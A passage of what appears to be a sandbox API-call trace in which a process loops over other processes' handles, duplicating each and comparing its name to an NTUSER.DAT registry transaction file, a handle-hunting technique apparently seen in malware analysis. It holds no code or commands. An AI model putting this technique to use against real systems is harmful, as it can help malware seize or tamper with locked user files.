(hObject=0x680) returned 1 [0154.657] CloseHandle (hObject=0x62c) returned 1 [0154.657] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.657] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x690, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.658] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.659] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.659] CloseHandle (hObject=0x670) returned 1 [0154.659] _wcsicmp (_Str1="\\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.659] CloseHandle (hObject=0x680) returned 1 [0154.659] CloseHandle (hObject=0x62c) returned 1 [0154.659] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.659] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.660] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.662] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.662] CloseHandle (hObject=0x670) returned 1 [0154.662] _wcsicmp (_Str1="\\WindowsUpdate.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0154.662] CloseHandle (hObject=0x680) returned 1 [0154.663] CloseHandle (hObject=0x62c) returned 1 [0154.663] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.663] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x72c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.663] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.663] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.664] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.664] CloseHandle (hObject=0x670) returned 1 [0154.664] _wcsicmp (_Str1="\\Microsoft-Windows-NetworkAccessProtection%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.664] CloseHandle (hObject=0x680) returned 1 [0154.664] CloseHandle (hObject=0x62c) returned 1 [0154.664] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.664] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x73c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.665] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.666] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.666] CloseHandle (hObject=0x670) returned 1 [0154.666] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4WHC.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.666] CloseHandle (hObject=0x680) returned 1 [0154.666] CloseHandle (hObject=0x62c) returned 1 [0154.666] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.666] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x748, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.667] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.667] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.668] CloseHandle (hObject=0x670) returned 1 [0154.668] _wcsicmp (_Str1="\\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.668] CloseHandle (hObject=0x680) returned 1 [0154.668] CloseHandle (hObject=0x62c) returned 1 [0154.668] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x62c [0154.668] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x754, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.668] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.669] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.669] CloseHandle (hObject=0x670) returned 1 [0154.669] _wcsicmp (_Str1="\\Microsoft-Windows-Windows Defender%4Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0154.669] CloseHandle (hObject=0x680) returned 1 [0154.669] CloseHandle (hObject=0x62c) returned 1 [0154.669] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.669] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.669] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.670] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.671] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.671] CloseHandle (hObject=0x670) returned 1 [0154.671] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.671] CloseHandle (hObject=0x680) returned 1 [0154.671] CloseHandle (hObject=0x62c) returned 1 [0154.671] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.671] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.671] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.672] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.674] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.674] CloseHandle (hObject=0x670) returned 1 [0154.674] CloseHandle (hObject=0x680) returned 1 [0154.674] CloseHandle (hObject=0x62c) returned 1 [0154.674] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.674] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.675] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.675] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.675] CloseHandle (hObject=0x670) returned 1 [0154.676] CloseHandle (hObject=0x680) returned 1 [0154.676] CloseHandle (hObject=0x62c) returned 1 [0154.676] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.676] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.676] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.676] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.677] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.677] CloseHandle (hObject=0x670) returned 1 [0154.677] CloseHandle (hObject=0x680) returned 1 [0154.677] CloseHandle (hObject=0x62c) returned 1 [0154.677] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.677] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x20c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.677] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.678] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.678] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.679] CloseHandle (hObject=0x670) returned 1 [0154.679] CloseHandle (hObject=0x680) returned 1 [0154.679] CloseHandle (hObject=0x62c) returned 1 [0154.679] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.679] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.679] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.679] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.680] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.680] CloseHandle (hObject=0x670) returned 1 [0154.680] _wcsicmp (_Str1="\\.", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -64 [0154.680] CloseHandle (hObject=0x680) returned 1 [0154.680] CloseHandle (hObject=0x62c) returned 1 [0154.680] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.680] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.681] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.682] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.682] CloseHandle (hObject=0x670) returned 1 [0154.682] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0154.682] CloseHandle (hObject=0x680) returned 1 [0154.682] CloseHandle (hObject=0x62c) returned 1 [0154.682] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.682] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x448, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.683] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.683] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.683] CloseHandle (hObject=0x670) returned 1 [0154.684] _wcsicmp (_Str1="\\$ObjId", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -74 [0154.684] CloseHandle (hObject=0x680) returned 1 [0154.684] CloseHandle (hObject=0x62c) returned 1 [0154.684] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.684] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x45c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.684] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.685] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.685] CloseHandle (hObject=0x670) returned 1 [0154.685] CloseHandle (hObject=0x680) returned 1 [0154.685] CloseHandle (hObject=0x62c) returned 1 [0154.685] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.685] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x468, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.686] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.687] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.687] CloseHandle (hObject=0x670) returned 1 [0154.687] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.687] CloseHandle (hObject=0x680) returned 1 [0154.687] CloseHandle (hObject=0x62c) returned 1 [0154.687] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.687] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.687] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.688] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.689] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.689] CloseHandle (hObject=0x670) returned 1 [0154.689] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.689] CloseHandle (hObject=0x680) returned 1 [0154.689] CloseHandle (hObject=0x62c) returned 1 [0154.689] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.689] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.689] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.690] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.690] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.691] CloseHandle (hObject=0x670) returned 1 [0154.691] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.691] CloseHandle (hObject=0x680) returned 1 [0154.691] CloseHandle (hObject=0x62c) returned 1 [0154.691] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.691] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.691] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.691] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.692] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.692] CloseHandle (hObject=0x670) returned 1 [0154.692] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0154.692] CloseHandle (hObject=0x680) returned 1 [0154.692] CloseHandle (hObject=0x62c) returned 1 [0154.692] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.692] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.692] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.693] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.693] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.694] CloseHandle (hObject=0x670) returned 1 [0154.694] CloseHandle (hObject=0x680) returned 1 [0154.694] CloseHandle (hObject=0x62c) returned 1 [0154.694] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.694] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.694] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.694] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.695] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.695] CloseHandle (hObject=0x670) returned 1 [0154.695] CloseHandle (hObject=0x680) returned 1 [0154.695] CloseHandle (hObject=0x62c) returned 1 [0154.695] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.695] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.695] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.696] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.697] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.697] CloseHandle (hObject=0x670) returned 1 [0154.697] CloseHandle (hObject=0x680) returned 1 [0154.697] CloseHandle (hObject=0x62c) returned 1 [0154.697] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.697] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.698] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.698] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.698] CloseHandle (hObject=0x670) returned 1 [0154.699] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.699] CloseHandle (hObject=0x680) returned 1 [0154.699] CloseHandle (hObject=0x62c) returned 1 [0154.699] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x62c [0154.699] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.699] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.700] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.700] CloseHandle (hObject=0x670) returned 1 [0154.700] CloseHandle (hObject=0x680) returned 1 [0154.700] CloseHandle (hObject=0x62c) returned 1 [0154.700] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.700] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.700] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.701] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.702] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.702] CloseHandle (hObject=0x670) returned 1 [0154.702] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0154.702] CloseHandle (hObject=0x680) returned 1 [0154.702] CloseHandle (hObject=0x62c) returned 1 [0154.703] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.703] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.703] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.703] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.704] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.704] CloseHandle (hObject=0x670) returned 1 [0154.704] CloseHandle (hObject=0x680) returned 1 [0154.704] CloseHandle (hObject=0x62c) returned 1 [0154.704] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x62c [0154.704] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.704] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 